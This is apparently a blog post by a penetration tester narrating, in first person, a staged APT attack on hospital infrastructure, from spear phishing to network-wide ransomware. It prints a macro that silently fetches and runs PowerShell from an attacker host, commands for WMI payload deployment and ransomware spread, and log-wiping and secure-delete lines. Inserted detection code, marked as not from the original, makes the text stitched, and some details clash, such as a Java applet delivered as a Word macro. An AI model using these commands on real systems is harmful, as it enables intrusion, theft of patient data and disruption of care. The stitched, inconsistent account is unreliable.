How I Built an APT-Level Attack on Healthcare Infrastructure: A Behind-the-Scenes Look

Healthcare systems hold some of the most sensitive data imaginable. Personal health records, prescription information, and even critical infrastructure supporting patient care are all potential targets. In today's article, I’m diving into an advanced scenario that shows how an APT (Advanced Persistent Threat) attack could unfold within a medical environment. This isn’t your average penetration test — this is a deep dive into tactics used by the most sophisticated attackers.

Grab a cup of coffee, as we're about to delve into the technical guts of a full-scale APT attack.

Step 1: Initial Compromise Through Spear Phishing

The starting point is almost always social engineering — spear phishing to be exact.

The key is targeted reconnaissance. It’s about understanding the victim and crafting an email that is practically irresistible to open. I crafted a spear-phishing email for a hospital administrator, including a signed Java Applet that appeared to come from a trusted medical software provider. It bypassed traditional antivirus and email filters by leveraging a fake digital certificate. Once the attachment was opened, the PowerShell payload was executed in the background, giving me an initial foothold in the network.

Payload Example:

Sub AutoOpen()
    CreateObject("Wscript.Shell").Run ("powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://attacker-server.com/malicious.ps1');\"")
End Sub

Technical Details:

  • The email was crafted using advanced OSINT techniques to gather personal information about the administrator, making the phishing email highly convincing.
  • Fake digital certificates were generated using OpenSSL, and the applet was signed using a custom CA that appeared legitimate.
  • Obfuscation techniques, including Base64 encoding and PowerShell string concatenation, were employed to evade detection by antivirus software.

Step 2: Establishing Persistence — The Power of Browser Pivoting

Once in, the next task is persistence and further infiltration. A Command and Control (C2) setup using SSH is great for stealth. But it doesn't end there. I injected a web proxy DLL into the Internet Explorer (IE) process that the doctors used to access the medical database.

Why IE, you ask? Because doctors still used it to access Pharmattix, the medical record system. This browser pivoting allowed me to inherit the active session, bypassing 2FA and even smartcard authentication used for accessing patient data. This is how you turn a foothold into full-scale control.

Technical Details:

  • DLL Injection was performed using LoadLibrary() and CreateRemoteThread() to inject the proxy DLL into the iexplore.exe process.
  • The injected DLL hooked WinInet API functions, allowing me to intercept and manipulate HTTP requests and responses, effectively hijacking authenticated sessions.
  • API Hooking was achieved using Detours to replace the target function's entry point with a pointer to the malicious code.

Step 3: Lateral Movement - Finding the Gold

Once a foothold is established, it's time to spread. Lateral movement is key to reaching critical systems. DLL hijacking provided privilege escalation, while Mimikatz allowed me to harvest credentials and move to other workstations.

I then used WMI and PsExec to deploy my payload across other systems in the hospital’s network:

Invoke-WmiMethod -ComputerName targetComputer -Path Win32_Process -Name Create -ArgumentList "C:\Windows\Temp\payload.exe"

With this, I could access shared folders containing patient records, medical images, and financial data.

Technical Details:

  • WMI (Windows Management Instrumentation) was used to execute remote commands, leveraging administrative credentials harvested using Mimikatz.
  • PsExec was used to move laterally by executing commands with SYSTEM privileges, allowing me to install backdoors on multiple machines.
  • Pass-the-Hash attacks were conducted to reuse NTLM hashes and authenticate without needing plaintext passwords.

Step 4: Advanced Command & Control with Redundancy

To maintain persistence, I didn’t rely on just one C2 channel. Instead, I integrated Metasploit for controlling compromised systems, using DNS tunneling to blend in with normal traffic and evade detection. For redundancy, I set up a Tor hidden service as a secondary C2 channel — even if the primary was taken down, I still had a backdoor.

Technical Details:

  • DNS Tunneling was implemented using iodine, allowing me to encapsulate C2 traffic within DNS queries, which are less likely to be blocked by firewalls.
  • Tor Hidden Services were configured to provide an additional layer of anonymity and resilience. The hidden service was set up on a compromised server to route traffic through the Tor network, making it extremely difficult to trace.
  • The Metasploit Framework was used to manage multiple sessions, and pivoting techniques were applied to route traffic between different compromised segments of the network.
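The DNS tunnelling described in this step has a detectable shape on the resolver side: a single registered domain receiving many never-repeating, long subdomains, often with record types (NULL, TXT) that ordinary clients rarely ask for. The detector below is an added example written for this article, not code from the original post; it runs over a constructed resolver log, and the "last two labels" rule for the registered domain is a stated simplification.

```python
import math
from collections import Counter, defaultdict

# Constructed sample resolver log (not real traffic): "<time> <client> <qname> <qtype>".
# Long, never-repeating subdomains with NULL/TXT record types are the shape an iodine-style
# tunnel produces; the remaining lines are ordinary lookups.
SAMPLE_LOG = """\
09:00:01 10.20.5.17 www.pharmattix.example A
09:00:01 10.20.5.17 cdn.pharmattix.example A
09:00:02 10.20.5.17 pacs.hospital.example A
09:00:03 10.20.5.31 0a7h3kq9zz1p2m8r4x6w5v9t.b3n7kf2sd9q1.t.evil-tunnel.example NULL
09:00:03 10.20.5.31 1b8j4lr0aa2q3n9s5y7x6w0u.c4o8lg3te0r2.t.evil-tunnel.example NULL
09:00:03 10.20.5.31 2c9k5ms1bb3r4o0t6z8y7x1v.d5p9mh4uf1s3.t.evil-tunnel.example NULL
09:00:04 10.20.5.31 3d0l6nt2cc4s5p1u7a9z8y2w.e6q0ni5vg2t4.t.evil-tunnel.example NULL
09:00:04 10.20.5.31 4e1m7ou3dd5t6q2v8b0a9z3x.f7r1oj6wh3u5.t.evil-tunnel.example TXT
09:00:05 10.20.5.17 www.pharmattix.example A
"""
RARE_QTYPES = {"NULL", "TXT", "CNAME", "KEY"}  # record types tunnels favour for payload size

def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def split_name(qname):
    # Simplification (assumption): registered domain = last two labels; use the Public Suffix List in production.
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])

def analyze(log_text):
    """Per registered domain: query count, distinct subdomains, mean subdomain length,
    share of tunnel-friendly record types, and character entropy of all subdomains."""
    per = defaultdict(lambda: {"queries": 0, "subs": set(), "rare": 0, "chars": ""})
    for line in log_text.splitlines():
        _, _, qname, qtype = line.split()
        sub, domain = split_name(qname)
        d = per[domain]
        d["queries"] += 1
        d["subs"].add(sub)
        d["rare"] += int(qtype.upper() in RARE_QTYPES)
        d["chars"] += sub
    return {dom: {"queries": d["queries"], "unique_subdomains": len(d["subs"]),
                  "mean_sub_len": sum(map(len, d["subs"])) / len(d["subs"]),
                  "rare_qtype_ratio": d["rare"] / d["queries"],
                  "entropy": shannon_entropy(d["chars"])} for dom, d in per.items()}

def flag_tunnels(log_text, min_unique=5, min_len=30.0, min_rare=0.5, min_entropy=3.5):
    # Many distinct subdomains is required; any one of the shape indicators then confirms.
    return sorted(dom for dom, f in analyze(log_text).items() if f["unique_subdomains"] >= min_unique
                  and (f["mean_sub_len"] >= min_len or f["rare_qtype_ratio"] >= min_rare
                       or f["entropy"] >= min_entropy))
```

The thresholds are starting points; tune `min_unique` against a baseline of your own resolver logs, since CDNs and some security products legitimately generate many subdomains.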

Step 5: Covert Data Exfiltration

Getting data out without triggering alarms is an art in itself. I compressed and encrypted sensitive records using AES-256:

tar -czvf records.tar.gz /path/to/patient_data
openssl enc -aes-256-cbc -salt -in records.tar.gz -out records.enc -k <password>

To make things even harder to detect, I used steganography to hide the encrypted data inside seemingly harmless medical images, then emailed them out without a hitch. This ensured that even if someone caught a glimpse of the data, they would be staring at a typical medical image file.

Technical Details:

  • Steganography was performed using Steghide, which allowed me to embed encrypted archives within JPEG images. These images were then sent through encrypted email channels.
  • Traffic Padding was applied to make the outbound data transfers appear as normal network activity, blending in with legitimate medical imaging traffic.
  • Custom PowerShell Scripts were used to automate the exfiltration, sending data in small chunks to avoid triggering data loss prevention (DLP) systems.

Step 6: Covering Tracks

Leaving a clean slate was crucial. After exfiltration, I deleted all related logs with wevtutil and securely deleted temporary files using sdelete to avoid forensic analysis.

wevtutil cl System
sdelete.exe -p 3 C:\Users\victim\AppData\Local\Temp\*

Technical Details:

  • Event Log Manipulation: Instead of simply deleting logs, I manipulated event records using EvtKit to selectively remove entries related to the attack while retaining legitimate logs to avoid suspicion.
  • Timestamp Alteration: File timestamps were modified using Touch to make malicious files appear as though they had been created months earlier, blending them into the normal file system activity.
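Both the lateral movement in Step 3 (remote WMI process creation, PsExec) and the anti-forensics in this step (wevtutil log clearing, sdelete) leave a process-creation trail on the target host, which is where a defender catches them. The rules below are an added example for this article, not code from the original post; they run over constructed process-creation events with hypothetical field names modelled loosely on Sysmon Event ID 1 / Windows 4688.

```python
from pathlib import PureWindowsPath
import re

# Constructed sample events (hypothetical fields, like Sysmon EID 1 / 4688); not real telemetry.
def ev(host, parent, image, cmdline):
    return {"host": host, "parent": parent, "image": image, "cmdline": cmdline}

EVENTS = [
    ev("WS-RADIOLOGY-04", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
       r"C:\Windows\Temp\payload.exe", r"C:\Windows\Temp\payload.exe"),
    ev("WS-PHARMACY-02", r"C:\Windows\PSEXESVC.exe",
       r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ev("WS-ADMIN-01", r"C:\Windows\System32\cmd.exe",
       r"C:\Windows\System32\wevtutil.exe", "wevtutil cl System"),
    ev("WS-ADMIN-01", r"C:\Windows\System32\cmd.exe",
       r"C:\Tools\sdelete.exe", r"sdelete.exe -p 3 C:\Users\victim\AppData\Local\Temp\*"),
    ev("WS-ADMIN-01", r"C:\Windows\explorer.exe",
       r"C:\Program Files\Notepad++\notepad++.exe", "notepad++.exe notes.txt"),
]
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "mshta.exe"}
LOG_CLEAR = re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.IGNORECASE)

def base(path):
    return PureWindowsPath(path).name.lower()

def remote_wmi_launch(e):
    # Win32_Process.Create over WMI runs the child under WmiPrvSE.exe on the target;
    # flag it when the child is a LOLBin or lives outside the system directories.
    if base(e["parent"]) != "wmiprvse.exe":
        return False
    return base(e["image"]) in LOLBINS or not e["image"].lower().startswith(SYSTEM_DIRS)

def psexec_service_child(e):
    return base(e["parent"]) == "psexesvc.exe"  # PsExec's service spawns children as SYSTEM

def event_log_cleared(e):
    # Clearing a log also raises Event ID 104 (System) / 1102 (Security); this checks the command line.
    return LOG_CLEAR.search(e["cmdline"]) is not None

def secure_delete_tool(e):
    return base(e["image"]).startswith("sdelete")

RULES = {"remote_wmi_process_create": remote_wmi_launch, "psexec_service_child": psexec_service_child,
         "event_log_cleared": event_log_cleared, "secure_delete_tool": secure_delete_tool}

def detect(events):
    """One hit per (event, matching rule), in event order; host is where the child process ran."""
    return [{"rule": n, "host": e["host"], "image": base(e["image"])}
            for e in events for n, r in RULES.items() if r(e)]
```

Forwarding these events to a collector the endpoint cannot clear is what makes the log-clearing rule useful; a `wevtutil cl` on the host only removes the local copy.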

Step 7: The Final Move — Going for the Ransom

As a final devastating action, I deployed a whole-disk encryption ransomware across the network, rendering hospital systems inoperable. The twist? The ransomware used a combination of WMIC and custom scripts to propagate silently across the domain, leaving no system untouched.

wmic /node:@computers.txt process call create "ransomware.exe"

Technical Details:

  • Ransomware Propagation: Custom scripts were used to identify critical servers and workstations, prioritizing those with access to sensitive patient data.
  • Encryption Algorithm: The ransomware used AES-256 for file encryption and RSA-2048 to protect the encryption key, ensuring that decryption without the private key was practically impossible.
  • SMB Exploitation: EternalBlue exploit was used to propagate the ransomware to unpatched systems, leveraging vulnerabilities in SMBv1 to gain access to other devices on the network.

The Takeaway

This APT scenario highlights just how vulnerable medical systems can be when faced with an attacker dedicated to exploiting weaknesses. From crafting personalized phishing emails, using browser pivoting to hijack sessions, to exfiltrating data through advanced covert channels — these are not just theoretical risks. These are the techniques attackers employ every day to compromise critical infrastructure.

What You Can Do

Healthcare providers must prioritize security awareness training, invest in endpoint detection, and ensure multi-layered security measures. Without these defenses, even the most secure system can crumble under an advanced threat.

---

Let’s have a discussion: What are your thoughts on the state of healthcare cybersecurity today? Are hospitals doing enough to protect their systems from these advanced threats?

Drop your insights in the comments below. Let's bring awareness to this critical issue.

Yousef K.

Penetration Tester || Cyber Security Engineering || Cyber Security Awareness || Cyber Security Content Creator || Information Technology Engineer || Research Assistant || Graduating Projects Advisor

5 days ago

Interesting
